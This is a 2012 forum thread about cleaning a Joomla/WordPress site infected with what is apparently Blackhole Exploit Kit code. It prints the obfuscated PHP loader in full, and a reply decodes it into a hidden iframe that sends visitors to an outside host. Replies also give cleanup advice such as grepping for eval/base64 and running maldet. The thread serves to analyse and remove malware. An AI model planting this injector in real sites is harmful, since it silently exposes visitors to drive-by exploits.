1. This site uses cookies. By continuing to use this site, you are agreeing to our use of cookies. Learn More.

Website Hacked! How To Remove Blackhole Exploit Kit?

Discussion in 'General Scripting Chat' started by redmoon, Oct 14, 2012.

  1. redmoon

    redmoon Regular Member

    Joined:
    Aug 19, 2009
    Messages:
    245
    Likes Received:
    73
    A website I work on was hacked and I believe its the Blackhole Exploit Kit. The site uses Joomla and Wordpress and the index.php pages show this obfuscated code at the top of the file:

    Code:
    [COLOR=#000000][FONT=Noteworthy][B]<?php eval(gzinflate(base64_decode('ABYH6fhpZiAoIWlzc2V0KCRmdGwpKXsgZ2xvYmFsICRmdGw7JGZ0bD0xOw0KCSRpcD0kX1NFUlZFUlsiUkVNT1RFX0FERFIiXTskZHI9JF9TRVJWRVJbIkRPQ1VNRU5UX1JPT1QiXTskdWEgPSAkX1NFUlZFUlsnSFRUUF9VU0VSX0FHRU5UJ107JGRiZj0kZHIuJy8nLm1kNSgkZHIpOw0KCWlmKChzdHJwb3MoJHVhLCdXaW5kb3dzJykhPT1mYWxzZSkmJigoc3RycG9zKCR1YSwnTVNJRScpIT09ZmFsc2UpfHwoc3RycG9zKCR1YSwnRmlyZWZveCcpIT09ZmFsc2UpKSYmKHN0cnBvcyhAZmlsZV9nZXRfY29udGVudHMoJGRiZiksJGlwKSA9PT0gZmFsc2UpKXsNCgkJZXJyb3JfcmVwb3J0aW5nKDApOw0KCQlwcmludChnemluZmxhdGUoYmFzZTY0X2RlY29kZSgnN0wwSFlCeEpsaVVtTDIzS2UzOUs5VXJYNEhTaENJQmdFeVRZa0VBUTdNR0l6ZWFTN0IxcFJ5TXBxeXFCeW1WV1pWMW1Ga0RNN1oyODk5NTc3NzMzM252dnZmZTZPNTFPSi9mZi96OWNabVFCYlBiT1N0ckpuaUdBcXNnZlAzNThIejhpSGpmVHVsaTFSNWVmZlhTWmZmVEpSK1ZIaDIxOS9Zdnp5VVdUMTVOUFBqbjhKZE9zbmM2M21tV2RYOVR2N3Z4aWZMdjFSZGJPUC9ub296dGJkL1RySDdTVHZMM3ppeGVmNFp2RC9QS3pxMkk1cTY2Kzl4R0J6RC82NVBMN2g3OGtXWDcyMGQ3OVgvZ0w5ejc5aGI5d2QyK1gvdGw5K0F0LzRmN0JML3lGOXgvZ0QvNzRBTDlSbzkxNysvZ1R2KzNpTTM3cDNyMWYrQXMvM2NOZk8vajhnWDUwY044MmZXQ2F5bS9jWWsvL09lQmZBR3lIWDBjSHdPQWh2M25QZnhNSTNlZVBHZlFEL1hqM0hqNy9WQkhlSVZDZk1wQWQvV1NmZnRsN0tDUHNqM1QzbnUzV2pldWV2b3YvUC9nMGZIMTNmMC9vb3lUQW16d2E0TExQRU9rZlFEQ2RlVVN3SkwwWGpNelI1Rk44Zm85SkRRd1pUVzVyQ1VDQUh6d3dYdzJOZ1BFVEd2T1huOHBMOTNubytJUmhjZ09NN2NHK0VJMTczK04vK0YwTFhRYjRVSC83MUF4WEdRQWY3ZlkvNGxiY28vbGNSbmZQL0dMbVVycGxhdTdxYndlTTlrUDlDN2gvcXJNdkpHWU9zQjBJTlVHWkEybjBLVHJibHdIdlc4Q0NueDJLRUhkdncxdVdTNFZEZWE1M0ZSK21wY2dETjlnMXYrM2F6L2JjdHdiR0EvN0lUaTFqeEVPdzhnUitVMkl3Q2hhdXpCYi9ZMWlHb2UzYWYrNjVMNW1ERExXNUc0RnJScUI4Zmsvbm5wby9zSzhJQk1NVytoV0crMENITHZPMVo2SHdTQUtHZnZCUU9QWCtnYnp0aThQdS9tN25BNEd5YndFWUR1cU1WaVp5VTdmOEdhc0NiaENUUTJHNmU5cFc1UGloL0lMaHlRZnZJYXVpRnQxY09uVndjQnNkYUhYYXhuRVo3Y1p6aUVhZm1nSG9LM3RHa2ZJLy9PV09CY29vQlhneFBCN2FydmtINDhCSG4rN29WLzhmVnhPRzgvaGI3bU5JbU9WTG5nT2pFRlE0N1dkNzdsdkc2SUV3eTMzWFlFQ1lXV3B1andXSTdObEgxNk1kc0tnSTAvY3RSZjk5c2JBTWE2ZlNhc2o3OGpQQ2lKWXk3bjM1a2tFZTZEKzNBUFNCSE8yRXljbXU4clRoN1U4OUJBYjR4TGt4Ym16OHBadnRDSjJ0TURzMnR4SmhtZXNtVEQ3SWRlQ3VIQVZackt6T2p6aHVQS0FETzNVN2pMaWgyVVBMWHZaTlMyZjVHTEFFS1oxWFZydzdEMlJVdXpzUERWb00wc2lwaHdPR3dOMDdNWksrME04RGJUcGdSVDRhTjZ1eWFMYysrb1cvOEtNN2gvUFA5ZzZieno3NjZMQTQzMXJjT2EvcXJlS3puY05pKy83Qnc5OFZ2M3kyKzBseDV4ZS8vYXhBQS9HRHg3TnF1bDdreS9aTzg4bG5yOXU2V0Y2TXordHFjVExQNnBOcWxtOHR2MWQ4ZjN0cloyL25rK0ozbjkrNWMvaExmdkJaZzlkMzluWS8rK3l6blhlN3UzZnl5NjBmMEJlUDc2ckgvdjhFQUFELy93PT0nKSkpOw0KCQlpZiAoJGZwID0gQGZvcGVuKCRkYmYgLCAiYSIpKXtmcHV0cygkZnAgLCAkaXAuJ3wnKTsgZmNsb3NlKCRmcCk7fQ0KCX0NCn0NCgEAAP//')));?>[/B][/FONT][/COLOR]

    When I remove it the code reappears. Can anyone tell me where to start to remove the hack? I've changed ftp, database, and login passwords but the virus keeps coming back.Also can anyone decode the script above so I know what it does?
     
  2. ReALeST

    ReALeST Power Member

    Joined:
    May 16, 2012
    Messages:
    584
    Likes Received:
    399
    probably an XSS attack....sorry mate..just pray he hasnt owned ur db too:p
     
    • Thanks Thanks x 1
  3. Newelly

    Newelly Regular Member

    Joined:
    Jul 25, 2012
    Messages:
    306
    Likes Received:
    93
    Location:
    ViceOffers
    I have Never come across anything like this, so i won't have a clue... Never had anything similar while owning websites and forums in the past however have you thought about checking out:

    forums.devshed

    They offer a variety of sections for hacking, decrypting and all that kinds of stuff...
    By all means i am not advertising or anything i just feel like it's a more suitable forum for something like this! Maybe someone here can decode/decrypt it but i am new here so i don't know hardly anyone here or there capabilities.

    I have decoded this: Newelly08 < is my s/k/y/p/e
    since i can't post links here.

    ~Newelly!
     
    Last edited: Oct 14, 2012
  4. sockpuppet

    sockpuppet Junior Member

    Joined:
    Nov 7, 2011
    Messages:
    155
    Likes Received:
    145
    Maybe there are some more files infected and these files write that shit into your index.php. You should look for 'eval', 'gzinflate' and 'base64_decode' in all your php files.

    decoded php:
    Code:
    if (!isset($ftl)){ global $ftl;$ftl=1;
    	$ip=$_SERVER["REMOTE_ADDR"];$dr=$_SERVER["DOCUMENT_ROOT"];$ua = $_SERVER['HTTP_USER_AGENT'];$dbf=$dr.'/'.md5($dr);
    	if((strpos($ua,'Windows')!==false)&&((strpos($ua,'MSIE')!==false)||(strpos($ua,'Firefox')!==false))&&(strpos(@file_get_contents($dbf),$ip) === false)){
    		error_reporting(0);
    		print(gzinflate(base64_decode('7L0HY...  --zip-- ...//w==')));
    		if ($fp = @fopen($dbf , "a")){fputs($fp , $ip.'|'); fclose($fp);}
    	}
    }
    
    
    the decoded javascript that the print call writes:
    Code:
    if (document.getElementsByTagName('body')[0]){
    			iframer();
    		} else {
    			document.write("<iframe src='http://jjzrsgs.dns-dns.com/t/vc.php?go=2' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>");
    		}
    		function iframer(){
    			var f = document.createElement('iframe');f.setAttribute('src','http://jjzrsgs.dns-dns.com/t/vc.php?go=2');f.style.visibility='hidden';f.style.position='absolute';f.style.left='0';f.style.top='0';f.setAttribute('width','10');f.setAttribute('height','10');
    			document.getElementsByTagName('body')[0].appendChild(f);
    		}
    
     
    • Thanks Thanks x 1
  5. redmoon

    redmoon Regular Member

    Joined:
    Aug 19, 2009
    Messages:
    245
    Likes Received:
    73
    I think so too. I've checked most of the php files and I think it's a backdoor I missed. Appreciate the help!
    @Realest I really hope this shit isn't in the db but the way it keeps coming back it might.
     
    Last edited: Oct 15, 2012
  6. latinofever

    latinofever Junior Member

    Joined:
    Mar 27, 2011
    Messages:
    190
    Likes Received:
    26
    Location:
    Planet Earth
    Home Page:
    I suggest you install maldet on your server then do a full scan for malware and backdoor scripts

    To install on centos

    cd /usr/local/src/
    wget http://www.rfxn.com/downloads/maldetect-current.tar.gz

    tar -xzf maldetect-current.tar.gz cd maldetect-*

    sh ./install.sh
    or
    sudo sh ./install.sh

    maldet ?update-ver

    Then run
    maldet -scan-all /



    This will run a scan



    Sent from my GT-I9100 using Tapatalk 2
     
    • Thanks Thanks x 2
    Last edited: Oct 28, 2012